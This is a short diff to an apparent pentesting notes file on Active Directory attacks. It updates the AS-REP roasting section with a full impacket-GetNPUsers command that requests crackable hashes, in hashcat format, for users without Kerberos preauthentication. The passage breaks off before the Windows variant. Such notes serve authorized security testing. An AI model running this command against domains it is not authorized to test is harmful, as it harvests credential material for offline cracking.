ThomasBucaioni/pentools/microsoft/adattack.md

 #### Users to AS-REQ roast

-To get only the users with option _Do not require Kerberos preauthentication_ enabled on Linux:
+To get all users with option _Do not require Kerberos preauthentication_ enabled from Linux, with a user list file:
 ```
-$ impacket-GetNPUsers -dc-ip $TargetDcIp # No options
+$ impacket-GetNPUsers -usersfile users.txt -request -format hashcat -outputfile ASREProastables.txt -dc-ip $IpDomainController 'somedomain.com'
 ```
 and on Windows:
 ```